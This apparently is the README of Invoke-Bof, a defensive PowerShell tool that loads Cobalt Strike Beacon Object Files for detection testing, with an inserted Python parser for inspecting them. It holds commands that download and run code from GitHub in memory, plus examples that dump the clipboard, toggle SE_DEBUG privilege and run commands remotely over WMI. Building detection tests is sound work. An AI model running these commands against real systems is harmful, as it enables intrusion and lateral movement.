Stars: 245 · Rank: 165,304 (Top 4 %) · Language: PowerShell · License: Apache License 2.0 · Created almost 3 years ago · Updated almost 3 years ago


Invoke-Bof

Load any Beacon Object File using Powershell!

> $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/airbus-cert/Invoke-Bof/raw/main/test/test_invoke_bof.x64.o").Content
> Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go -ArgumentList "toto",14

██╗███╗   ██╗██╗   ██╗ ██████╗ ██╗  ██╗███████╗    ██████╗  ██████╗ ███████╗
██║████╗  ██║██║   ██║██╔═══██╗██║ ██╔╝██╔════╝    ██╔══██╗██╔═══██╗██╔════╝
██║██╔██╗ ██║██║   ██║██║   ██║█████╔╝ █████╗█████╗██████╔╝██║   ██║█████╗  
██║██║╚██╗██║╚██╗ ██╔╝██║   ██║██╔═██╗ ██╔══╝╚════╝██╔══██╗██║   ██║██╔══╝  
██║██║ ╚████║ ╚████╔╝ ╚██████╔╝██║  ██╗███████╗    ██████╔╝╚██████╔╝██║     
╚═╝╚═╝  ╚═══╝  ╚═══╝   ╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝     
                                               
  [v0.1 Made with love by Airbus CERT https://github.com/airbus-cert]

[+] Mapping of .text    at  0x19924310000
[+] Mapping of .rdata   at  0x19924320000
[+] Mapping of .xdata   at  0x19924330000
[+] Mapping of .pdata   at  0x19924540000
[+] Mapping of /4       at  0x19924550000
[+] Jump into beacon at 0x19924310000
****************************************************************************
Test Beacon for Invoke-Bof
Argument 1 : toto
Argument 2 : 14

=============================== Beacon Output ==============================
00000000   66 6F 6F 00 6F 00 00 00 62 61 72 20 32 32 32 33  foo.o...bar 2223
00000010   33 33                                            33              
============================================================================
[+] Clipboard updated !
[!] Active Windows : Windows PowerShell ISE
[!] Content : $BOFBytes = [IO.File]::ReadAllBytes($Path)
****************************************************************************

CobaltStrike appears to be the favoured offensive framework, used by a large majority of the offensive side of cybersecurity.

The framework is very extensible and allows Red Teamers to develop specific offensive modules named BOFs, short for Beacon Object Files. Beacons are what CobaltStrike calls its agents, or final payloads.

A Beacon Object File is split into two parts:

  • A payload that will be executed on the victim machine
  • An aggressor script, which will prepare and interact with the payload

Many Red Teams publish BOFs on their public GitHub repositories, implementing lateral movement, vulnerability or attack techniques, or persistence. Instead of reimplementing these techniques each time we want to try to detect them, we decided to find a way to execute them directly.

Get-Help Invoke-Bof

Parameter help

BOFBytes
    A byte array containing the Beacon Object File to load and execute.
    Loading a BOF from a local file:
        $BOFBytes = [IO.File]::ReadAllBytes("c:\my_bof.o")
    A BOF hosted on a repository:
        $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/airbus-cert/Invoke-Bof/raw/main/test/test_invoke_bof.x64.o").Content

EntryPoint
    Name of the function to call (the convention is to name the entry point go).

ArgumentList
    List of all arguments that will be passed to the entry point. For example, to marshal two arguments, the first as a string and the second as an integer:
        Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go -ArgumentList "toto",14
    To know the parameters accepted by a BOF, take a look at its aggressor script.

UnicodeStringParameter
    Marshal all string parameters as UTF-16LE strings.

Example :

$BOFBytes = (Invoke-WebRequest -Uri "https://github.com/airbus-cert/Invoke-Bof/raw/main/test/test_invoke_bof.x64.o").Content
Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go -ArgumentList "toto",14

How does it work?

✈️ If you want to know what is behind the scenes, please read the dedicated blog post!!! ✈️
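The loader output above shows the two things any BOF loader has to do with a COFF object: map its sections (a name such as /4 is a decimal offset into the COFF string table) and resolve its undefined symbols, which the BOF convention names `__imp_LIB$Function` for Win32 APIs; anything without the `LIB$` form, such as `__imp_LocalFree` or a C++ mangled name, cannot be resolved that way. The following Python parser is an added example, not part of Invoke-Bof, that lets a defender list a BOF's sections and imports before executing it. The sample object is constructed inline, and the rule that `Beacon*` names are the Beacon API is a Cobalt Strike convention assumed here, not something this page states.

```python
import struct

def parse_coff(data):
    """Return (sections, symbols) of a COFF object, resolving '/N' section and string-table symbol names."""
    _machine, nsec, _ts, symptr, nsym, opt_size, _flags = struct.unpack_from("<HHIIIHH", data, 0)
    strtab = data[symptr + nsym * 18:]                       # string table follows the symbol table
    name_at = lambda off: strtab[off:strtab.index(b"\0", off)].decode()
    sections = []
    for i in range(nsec):
        name, _vs, _va, rawsize, _rp, _rl, _lp, nrel, _nl, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, 20 + opt_size + i * 40)
        name = name.rstrip(b"\0").decode()
        if name.startswith("/"):                             # '/N': decimal offset into the string table
            name = name_at(int(name[1:]))
        sections.append({"name": name, "size": rawsize, "relocs": nrel, "flags": chars})
    symbols, i = [], 0
    while i < nsym:
        name8, _val, secnum, _typ, cls, naux = struct.unpack_from("<8sIhHBB", data, symptr + i * 18)
        long_name = name8[:4] == b"\0\0\0\0"                 # zero prefix: offset into the string table
        name = name_at(struct.unpack("<I", name8[4:])[0]) if long_name else name8.rstrip(b"\0").decode()
        symbols.append({"name": name, "section": secnum, "class": cls})
        i += 1 + naux                                        # skip auxiliary records
    return sections, symbols

def classify_imports(symbols):
    """Sort undefined externals into LIB$Func Win32 imports, Beacon API calls, or names a BOF loader cannot resolve."""
    win32, beacon, unresolvable = [], [], []
    for s in symbols:
        if s["section"] != 0 or s["class"] != 2:            # 2 = IMAGE_SYM_CLASS_EXTERNAL; section 0 = undefined
            continue
        name = s["name"][6:] if s["name"].startswith("__imp_") else s["name"]   # x64 import prefix
        if "$" in name:
            win32.append(tuple(name.split("$", 1)))
        elif name.startswith("Beacon"):                      # assumed convention: Beacon API provided by the agent
            beacon.append(name)
        else:
            unresolvable.append(s["name"])                   # e.g. __imp_LocalFree or C++ mangled names
    return win32, beacon, unresolvable

def build_sample_bof():
    """Constructed minimal x64 object (not a real BOF) with one short- and one long-named section."""
    names = [".rdata$zzz", "__imp_KERNEL32$GetLastError", "__imp_BeaconPrintf", "_Unwind_Resume"]
    lens = [len(n) + 1 for n in names]
    offs = [4 + sum(lens[:i]) for i in range(len(names))]
    strtab = struct.pack("<I", 4 + sum(lens)) + b"".join(n.encode() + b"\0" for n in names)
    sym = lambda name8, sec: struct.pack("<8sIhHBB", name8, 0, sec, 0x20, 2, 0)
    return (struct.pack("<HHIIIHH", 0x8664, 2, 0, 101, 4, 0, 0)       # symbol table right after 1-byte .text
            + struct.pack("<8sIIIIIIHHI", b".text", 0, 0, 1, 100, 0, 0, 0, 0, 0x60000020)
            + struct.pack("<8sIIIIIIHHI", b"/%d" % offs[0], 0, 0, 0, 0, 0, 0, 0, 0, 0x40000040)
            + b"\xc3" + sym(b"go", 1) + b"".join(sym(struct.pack("<II", 0, o), 0) for o in offs[1:]) + strtab)
```

Running `classify_imports` on a downloaded BOF before passing it to Invoke-Bof shows which DLL exports it will call and which symbols the loader will report as unparseable.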

Launch Every Beacon Carefully!

Now we can launch every beacon available from GitHub. For example, we can test a beacon that dumps our clipboard:

> $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/DallasFR/BOF_dumpclip/raw/main/dump.o").Content
> Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go



██╗███╗   ██╗██╗   ██╗ ██████╗ ██╗  ██╗███████╗    ██████╗  ██████╗ ███████╗
██║████╗  ██║██║   ██║██╔═══██╗██║ ██╔╝██╔════╝    ██╔══██╗██╔═══██╗██╔════╝
██║██╔██╗ ██║██║   ██║██║   ██║█████╔╝ █████╗█████╗██████╔╝██║   ██║█████╗  
██║██║╚██╗██║╚██╗ ██╔╝██║   ██║██╔═██╗ ██╔══╝╚════╝██╔══██╗██║   ██║██╔══╝  
██║██║ ╚████║ ╚████╔╝ ╚██████╔╝██║  ██╗███████╗    ██████╔╝╚██████╔╝██║     
╚═╝╚═╝  ╚═══╝  ╚═══╝   ╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝     
                                               
  [v0.1 Made with love by Airbus CERT https://github.com/airbus-cert]



[+] Mapping of .text    at  0x133e0c20000
[+] Mapping of .rdata   at  0x133e0c30000
[+] Mapping of .xdata   at  0x133e0c40000
[+] Mapping of .pdata   at  0x133e0c50000
[+] Mapping of /4       at  0x133e0c60000
[+] Jump into beacon at 0x133e0c20000
****************************************************************************
[+] Clipboard updated !
[!]Active Windows : Windows PowerShell ISE
[!] Content : $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/DallasFR/BOF_dumpclip/raw/main/dump.o").Content
Invoke-Bof -BOFBytes $BOFBytes  -EntryPoint go
----------------------------------

****************************************************************************

We can try to detect an attacker that tries to enable the SE_DEBUG privilege:

> $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/EspressoCake/Toggle_Token_Privileges_BOF/raw/main/dist/toggle_privileges_bof.x64.o").Content
> Invoke-Bof -BOFBytes $BOFBytes -EntryPoint enable -ArgumentList 20



██╗███╗   ██╗██╗   ██╗ ██████╗ ██╗  ██╗███████╗    ██████╗  ██████╗ ███████╗
██║████╗  ██║██║   ██║██╔═══██╗██║ ██╔╝██╔════╝    ██╔══██╗██╔═══██╗██╔════╝
██║██╔██╗ ██║██║   ██║██║   ██║█████╔╝ █████╗█████╗██████╔╝██║   ██║█████╗  
██║██║╚██╗██║╚██╗ ██╔╝██║   ██║██╔═██╗ ██╔══╝╚════╝██╔══██╗██║   ██║██╔══╝  
██║██║ ╚████║ ╚████╔╝ ╚██████╔╝██║  ██╗███████╗    ██████╔╝╚██████╔╝██║     
╚═╝╚═╝  ╚═══╝  ╚═══╝   ╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝     
                                               
  [v0.1 Made with love by Airbus CERT https://github.com/airbus-cert]



[+] Mapping of .text    at  0x133e0ab0000
[+] Mapping of .data    at  0x133e0bf0000
[+] Mapping of .xdata   at  0x133e0c20000
[+] Mapping of .pdata   at  0x133e0c30000
[+] Mapping of .rdata   at  0x133e0c40000
[+] Mapping of /4       at  0x133e0c50000
[+] Jump into beacon at 0x133e0ab0c10
****************************************************************************
Authors:
	@the_bit_diddler
	@hackersoup

You are not currently in an administrative session. Come again later!

****************************************************************************


Or execute a process through WMI process creation:

> $BOFBytes = (Invoke-WebRequest -Uri "https://github.com/Yaxser/CobaltStrike-BOF/raw/master/WMI%20Lateral%20Movement/ProcCreate.x64.o").Content
> Invoke-Bof -BOFBytes $BOFBytes -EntryPoint go -ArgumentList "\\COMPUTER\ROOT\CIMV2","domain","username","username","cmd.exe /C powershell.exe",1 -UnicodeStringParameter


██╗███╗   ██╗██╗   ██╗ ██████╗ ██╗  ██╗███████╗    ██████╗  ██████╗ ███████╗
██║████╗  ██║██║   ██║██╔═══██╗██║ ██╔╝██╔════╝    ██╔══██╗██╔═══██╗██╔════╝
██║██╔██╗ ██║██║   ██║██║   ██║█████╔╝ █████╗█████╗██████╔╝██║   ██║█████╗
██║██║╚██╗██║╚██╗ ██╔╝██║   ██║██╔═██╗ ██╔══╝╚════╝██╔══██╗██║   ██║██╔══╝
██║██║ ╚████║ ╚████╔╝ ╚██████╔╝██║  ██╗███████╗    ██████╔╝╚██████╔╝██║
╚═╝╚═╝  ╚═══╝  ╚═══╝   ╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═════╝  ╚═════╝ ╚═╝

  [v0.1 Made with love by Airbus CERT https://github.com/airbus-cert]



[+] Mapping of .text at  0x2e940940000
[+] Mapping of /4 at  0x2e95a880000
[+] Mapping of /30 at  0x2e95a890000
[+] Mapping of /57 at  0x2e95a8f0000
[+] Mapping of /84 at  0x2e95a900000
[+] Mapping of /110 at  0x2e95b160000
[+] Mapping of /137 at  0x2e95b170000
[+] Mapping of /164 at  0x2e95b180000
[+] Mapping of /193 at  0x2e95b190000
[+] Mapping of /223 at  0x2e95b1a0000
[+] Mapping of .xdata at  0x2e95b1b0000
[+] Mapping of .pdata at  0x2e95b1c0000
[+] Mapping of .rdata at  0x2e95b1d0000
[+] Mapping of /253 at  0x2e95b1e0000
[+] Mapping of /277 at  0x2e95b1f0000
[+] Mapping of /301 at  0x2e95b200000
[+] Mapping of /325 at  0x2e95b230000
[!] Unable to parse API name :  _ZTV10_com_error  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZN10_com_error4DtorEv  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZN10_com_errorD1Ev  /!\ continue without resolving /!\
[!] Unable to parse API name :  __imp_LocalFree  /!\ continue without resolving /!\
[!] Unable to parse API name :  _Unwind_Resume  /!\ continue without resolving /!\
[!] Unable to parse API name :  __cxa_call_unexpected  /!\ continue without resolving /!\
[!] Unable to parse API name :  __gxx_personality_seh0  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZTI10_com_error  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZN10_com_errorD1Ev  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZN10_com_errorD0Ev  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZTVN10__cxxabiv117__class_type_infoE  /!\ continue without resolving /!\
[!] Unable to parse API name :  _ZTS10_com_error  /!\ continue without resolving /!\
[+] Jump into beacon at 0x2e940940181
****************************************************************************
ExecMethod Succeeded!
****************************************************************************
